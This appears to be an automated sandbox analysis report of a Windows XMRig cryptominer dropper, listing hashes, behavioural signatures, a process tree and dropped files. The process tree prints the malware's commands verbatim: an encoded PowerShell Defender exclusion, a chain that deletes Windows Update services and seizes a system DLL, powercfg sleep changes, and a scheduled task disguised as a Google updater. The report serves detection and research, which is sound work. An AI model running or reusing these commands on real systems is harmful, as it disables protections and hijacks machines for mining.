Analysis

  • max time kernel
    301s
  • max time network
    275s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    14-07-2022 22:15

General

  • Target

    d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe

  • Size

    7.5MB

  • MD5

    dd9d0dfb0b3d274e3a418084142afcc6

  • SHA1

    ffacc4206b3b84a6d2c105390cf1815e022e02a5

  • SHA256

    d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f

  • SHA512

    d21d35069ddedc02680f8a93f37f4ddb586b0f528bebbe13f1f917de1f9c9e87c79ba29169cd30a65f227c00db52de941d64b43b0727b9809f7f4885a58aa516

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner payload 13 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 46 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe
    "C:\Users\Admin\AppData\Local\Temp\d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1488
    • C:\Windows\Temp\setup.exe
      "C:\Windows\Temp\setup.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of WriteProcessMemory
      PID:1920
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
        3⤵
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1800
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAdwB4AGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBvAGgAdwAjAD4A"
          4⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1068
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:892
          • C:\Windows\system32\sc.exe
            sc stop UsoSvc
            5⤵
            • Launches sc.exe
            PID:1960
          • C:\Windows\system32\sc.exe
            sc stop WaaSMedicSvc
            5⤵
            • Launches sc.exe
            PID:2000
          • C:\Windows\system32\sc.exe
            sc stop wuauserv
            5⤵
            • Launches sc.exe
            PID:2004
          • C:\Windows\system32\sc.exe
            sc stop bits
            5⤵
            • Launches sc.exe
            PID:1148
          • C:\Windows\system32\sc.exe
            sc stop dosvc
            5⤵
            • Launches sc.exe
            PID:288
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
            5⤵
            • Modifies registry key
            PID:1716
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
            5⤵
            • Modifies registry key
            PID:1496
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
            5⤵
            • Modifies security service
            • Modifies registry key
            PID:640
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
            5⤵
            • Modifies registry key
            PID:324
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
            5⤵
            • Modifies registry key
            PID:2028
          • C:\Windows\system32\takeown.exe
            takeown /f C:\Windows\System32\WaaSMedicSvc.dll
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:1336
          • C:\Windows\system32\icacls.exe
            icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:624
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1144
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1708
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:956
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1716
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
            5⤵
              PID:1612
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
              5⤵
                PID:968
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                5⤵
                  PID:1724
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                  5⤵
                    PID:324
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                    5⤵
                      PID:980
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                      5⤵
                        PID:1364
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                        5⤵
                          PID:1908
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1908
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1732
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-dc 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1612
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1724
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-dc 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1036
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
                        4⤵
                          PID:1376
                          • C:\Windows\system32\schtasks.exe
                            schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
                            5⤵
                            • Creates scheduled task(s)
                            PID:940
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                          4⤵
                            PID:1992
                            • C:\Windows\system32\schtasks.exe
                              schtasks /run /tn "GoogleUpdateTaskMachineQC"
                              5⤵
                                PID:1948
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c ""C:\Windows\Temp\run.bat" "
                          2⤵
                          • Drops startup file
                          PID:1724
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c ""C:\Windows\Temp\lol.bat" "
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1336
                          • C:\Program Files\Internet Explorer\iexplore.exe
                            "C:\Program Files\Internet Explorer\iexplore.exe" https://take-realprize.life/?u=lq1pd08&o=hdck0gl
                            3⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SetWindowsHookEx
                            • Suspicious use of WriteProcessMemory
                            PID:1124
                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1124 CREDAT:275457 /prefetch:2
                              4⤵
                              • Modifies Internet Explorer settings
                              • Suspicious use of SetWindowsHookEx
                              PID:1392
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {2BE7166A-1A2E-45AD-8404-B52AAF383B0A} S-1-5-18:NT AUTHORITY\System:Service:
                        1⤵
                        • Loads dropped DLL
                        PID:1812
                        • C:\Program Files\Google\Chrome\updater.exe
                          "C:\Program Files\Google\Chrome\updater.exe"
                          2⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Executes dropped EXE
                          • Checks BIOS information in registry
                          • Checks whether UAC is enabled
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          PID:544
                          • C:\Windows\System32\conhost.exe
                            "C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"
                            3⤵
                            • Drops file in Drivers directory
                            • Suspicious use of SetThreadContext
                            • Drops file in Program Files directory
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:908
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAdwB4AGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBvAGgAdwAjAD4A"
                              4⤵
                              • Drops file in System32 directory
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1708
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                              4⤵
                                PID:2024
                                • C:\Windows\system32\sc.exe
                                  sc stop UsoSvc
                                  5⤵
                                  • Launches sc.exe
                                  PID:1528
                                • C:\Windows\system32\sc.exe
                                  sc stop WaaSMedicSvc
                                  5⤵
                                  • Launches sc.exe
                                  PID:1496
                                • C:\Windows\system32\sc.exe
                                  sc stop wuauserv
                                  5⤵
                                  • Launches sc.exe
                                  PID:764
                                • C:\Windows\system32\sc.exe
                                  sc stop bits
                                  5⤵
                                  • Launches sc.exe
                                  PID:1980
                                • C:\Windows\system32\sc.exe
                                  sc stop dosvc
                                  5⤵
                                  • Launches sc.exe
                                  PID:1912
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                  5⤵
                                  • Modifies registry key
                                  PID:936
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                  5⤵
                                  • Modifies registry key
                                  PID:1724
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                  5⤵
                                  • Modifies registry key
                                  PID:1036
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                  5⤵
                                  • Modifies registry key
                                  PID:2004
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                  5⤵
                                  • Modifies registry key
                                  PID:1952
                                • C:\Windows\system32\takeown.exe
                                  takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                  5⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:676
                                • C:\Windows\system32\icacls.exe
                                  icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                  5⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  PID:1528
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                  5⤵
                                  • Modifies registry key
                                  PID:916
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                  5⤵
                                  • Modifies registry key
                                  PID:1408
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                  5⤵
                                  • Modifies registry key
                                  PID:980
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                  5⤵
                                  • Modifies registry key
                                  PID:1588
                                • C:\Windows\system32\schtasks.exe
                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                  5⤵
                                    PID:1040
                                  • C:\Windows\system32\schtasks.exe
                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                    5⤵
                                      PID:616
                                    • C:\Windows\system32\schtasks.exe
                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                      5⤵
                                        PID:1052
                                      • C:\Windows\system32\schtasks.exe
                                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                        5⤵
                                          PID:968
                                        • C:\Windows\system32\schtasks.exe
                                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                          5⤵
                                            PID:2012
                                          • C:\Windows\system32\schtasks.exe
                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                            5⤵
                                              PID:1712
                                            • C:\Windows\system32\schtasks.exe
                                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                              5⤵
                                                PID:1736
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                              4⤵
                                                PID:544
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -hibernate-timeout-ac 0
                                                  5⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1612
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -hibernate-timeout-dc 0
                                                  5⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1408
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -standby-timeout-ac 0
                                                  5⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1040
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -standby-timeout-dc 0
                                                  5⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:272
                                              • C:\Windows\System32\conhost.exe
                                                C:\Windows\System32\conhost.exe "nniaxtfqr"
                                                4⤵
                                                  PID:2004
                                                • C:\Windows\explorer.exe
                                                  C:\Windows\explorer.exe yaczcwmfonlx1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8bcGQHQgT6vgy/6HYtv8SPnEokOLbkto/HrPVPk3hf3Z
                                                  4⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1876

                                          Network

                                          MITRE ATT&CK Enterprise v6

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\Program Files\Google\Chrome\updater.exe
                                            Filesize

                                            7.3MB

                                            MD5

                                            baeb20fb698c26b6f053215674129767

                                            SHA1

                                            5eb9614a66b13b71841c8fbe7e770b17ceb3c964

                                            SHA256

                                            99e60e60a88630a8b730e0ca877bb62fde487d308729e627310a6168830d45e0

                                            SHA512

                                            a25d0b578ae2c7095389e885434110116314ef4b20aed91df39de9167bc39775737be5fd73709c4f6f3c8f83800e109cf25389c4e2be37deb97f048de324965c

                                          • C:\Program Files\Google\Chrome\updater.exe
                                            Filesize

                                            7.3MB

                                            MD5

                                            baeb20fb698c26b6f053215674129767

                                            SHA1

                                            5eb9614a66b13b71841c8fbe7e770b17ceb3c964

                                            SHA256

                                            99e60e60a88630a8b730e0ca877bb62fde487d308729e627310a6168830d45e0

                                            SHA512

                                            a25d0b578ae2c7095389e885434110116314ef4b20aed91df39de9167bc39775737be5fd73709c4f6f3c8f83800e109cf25389c4e2be37deb97f048de324965c

                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                                            Filesize

                                            60KB

                                            MD5

                                            589c442fc7a0c70dca927115a700d41e

                                            SHA1

                                            66a07dace3afbfd1aa07a47e6875beab62c4bb31

                                            SHA256

                                            2e5cb72e9eb43baafb6c6bfcc573aac92f49a8064c483f9d378a9e8e781a526a

                                            SHA512

                                            1b5fa79e52be495c42cf49618441fb7012e28c02e7a08a91da9213db3ab810f0e83485bc1dd5f625a47d0ba7cfcdd5ea50acc9a8dcebb39f048c40f01e94155b

                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                            Filesize

                                            340B

                                            MD5

                                            6e051a243a356765834c88dcee7b4ac8

                                            SHA1

                                            78b4b538f3a1e334a827c1c9160bb0a3fc826c62

                                            SHA256

                                            873c1b69c58bff048a7ee16e185818cf3d32aa6310844227fb30e7068c24f6d2

                                            SHA512

                                            7479f7b939cd4655a6650c33bc11dc8e47bc7608ee25d8803fe833b9796f04410590217ae90c0d92d7989639dd77f677995c1b310e7c221a29b7660c868aaebd

                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\Q277GLCK.txt
                                            Filesize

                                            602B

                                            MD5

                                            b6c9cd37dd7117c47982348fda368239

                                            SHA1

                                            c0d22fc631fcd002afbff208ff570fd9c3bf7a17

                                            SHA256

                                            d68f910fa80af7ac7299b335f7a16006914e6c2b2c25890c030f056552e4d12a

                                            SHA512

                                            68acf6832f95d1ca415bd30dbcba9597e4246c01208577057dda955c6d97ba56e1a2af5e2802c649b7d481f1c10b56b9b230009c8178b1026e77deb0d2af6291

                                          • C:\Windows\Temp\lol.bat
                                            Filesize

                                            59B

                                            MD5

                                            f580e0e80cc87b25e38ea2c0c8059d04

                                            SHA1

                                            299f51dca9c609d6da86f93c424e39c1e6ba0d94

                                            SHA256

                                            9e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734

                                            SHA512

                                            5a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d

                                          • C:\Windows\Temp\run.bat
                                            Filesize

                                            98B

                                            MD5

                                            731afe244b2414169a5f630d52646e56

                                            SHA1

                                            e3771ccdccd8c306ee5fc4f264cfc3310690458c

                                            SHA256

                                            6c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552

                                            SHA512

                                            84e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1

                                          • C:\Windows\Temp\setup.exe
                                            Filesize

                                            7.3MB

                                            MD5

                                            baeb20fb698c26b6f053215674129767

                                            SHA1

                                            5eb9614a66b13b71841c8fbe7e770b17ceb3c964

                                            SHA256

                                            99e60e60a88630a8b730e0ca877bb62fde487d308729e627310a6168830d45e0

                                            SHA512

                                            a25d0b578ae2c7095389e885434110116314ef4b20aed91df39de9167bc39775737be5fd73709c4f6f3c8f83800e109cf25389c4e2be37deb97f048de324965c

                                          • C:\Windows\Temp\setup.exe
                                            Filesize

                                            7.3MB

                                            MD5

                                            baeb20fb698c26b6f053215674129767

                                            SHA1

                                            5eb9614a66b13b71841c8fbe7e770b17ceb3c964

                                            SHA256

                                            99e60e60a88630a8b730e0ca877bb62fde487d308729e627310a6168830d45e0

                                            SHA512

                                            a25d0b578ae2c7095389e885434110116314ef4b20aed91df39de9167bc39775737be5fd73709c4f6f3c8f83800e109cf25389c4e2be37deb97f048de324965c

                                          • C:\Windows\system32\drivers\etc\hosts
                                            Filesize

                                            2KB

                                            MD5

                                            c5227366b7a688ff23b01788718251aa

                                            SHA1

                                            9795262e79c832ba49c744fcd1b1794c0ffb5c6a

                                            SHA256

                                            789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48

                                            SHA512

                                            8b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe

                                          • \Program Files\Google\Chrome\updater.exe
                                            Filesize

                                            7.3MB

                                            MD5

                                            baeb20fb698c26b6f053215674129767

                                            SHA1

                                            5eb9614a66b13b71841c8fbe7e770b17ceb3c964

                                            SHA256

                                            99e60e60a88630a8b730e0ca877bb62fde487d308729e627310a6168830d45e0

                                            SHA512

                                            a25d0b578ae2c7095389e885434110116314ef4b20aed91df39de9167bc39775737be5fd73709c4f6f3c8f83800e109cf25389c4e2be37deb97f048de324965c

                                          • \Windows\Temp\setup.exe
                                            Filesize

                                            7.3MB

                                            MD5

                                            baeb20fb698c26b6f053215674129767

                                            SHA1

                                            5eb9614a66b13b71841c8fbe7e770b17ceb3c964

                                            SHA256

                                            99e60e60a88630a8b730e0ca877bb62fde487d308729e627310a6168830d45e0

                                            SHA512

                                            a25d0b578ae2c7095389e885434110116314ef4b20aed91df39de9167bc39775737be5fd73709c4f6f3c8f83800e109cf25389c4e2be37deb97f048de324965c

